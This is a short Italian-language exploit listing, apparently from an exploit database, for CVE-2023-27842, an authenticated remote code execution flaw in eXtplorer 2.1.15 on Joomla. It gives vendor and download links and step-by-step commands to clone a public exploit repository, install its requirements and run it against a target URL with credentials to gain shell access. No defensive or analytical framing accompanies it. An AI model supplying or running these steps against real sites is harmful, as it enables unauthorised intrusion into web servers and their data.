
Exploit di esecuzione remota di codice autenticato per eXtplorer 2.1.15 su Joomla. Strumento basato su Python che sfrutta permessi insicuri per ottenere accesso shell.
eXtplorer 2.1.15 – Permessi insicuri dopo Esecuzione di Codice Remoto (Autenticato)
Homepage del fornitore: http://extplorer.net/
Link del software: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip
Versione: 2.1.15
git clone https://github.com/0xFTW/CVE-2023-27842
cd CVE-2023-27842
pip3 install -r requirements.txt
chmod +x CVE-2023-27842
./CVE-2023-27842.py URL USERNAME PASSWORD
Note: This exploit is currently only functional for joomla based websites with extplorer extension.